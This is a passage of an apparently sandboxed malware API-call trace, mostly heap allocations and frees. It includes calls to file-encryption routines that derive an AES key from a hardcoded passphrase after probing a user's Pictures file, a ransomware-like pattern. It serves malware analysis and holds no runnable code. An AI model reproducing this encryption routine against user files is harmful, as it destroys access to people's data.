hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0094.233] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.234] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.234] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0094.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0094.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0094.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0094.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0094.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca478, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0094.236] CloseHandle (hObject=0x298) returned 1 [0094.236] FreeLibrary (hLibModule=0x772d0000) returned 1 [0094.237] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0094.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\J06YyOv018ZbSPW7yM.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51874400, ftCreationTime.dwHighDateTime=0x1d5e602, ftLastAccessTime.dwLowDateTime=0x470c54d0, ftLastAccessTime.dwHighDateTime=0x1d5e8db, ftLastWriteTime.dwLowDateTime=0x470c54d0, ftLastWriteTime.dwHighDateTime=0x1d5e8db, nFileSizeHigh=0x0, nFileSizeLow=0x541d, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="J06YyOv018ZbSPW7yM.png", cAlternateFileName="J06YYO~1.PNG")) returned 0x41ac780 [0094.237] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0094.237] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.237] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0094.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0094.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0094.291] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0094.292] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0094.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.292] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0094.292] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.292] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.292] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0094.293] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.293] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0094.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.293] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cac40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0094.293] CryptHashData (hHash=0x41ac280, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0094.293] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.293] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cace8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0094.294] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac140) returned 1 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0094.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0094.295] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0094.295] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0094.296] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0094.296] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0094.296] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0094.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad18 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0094.296] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0094.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab20 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.297] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0094.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0094.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab98 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0094.298] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0094.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0094.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 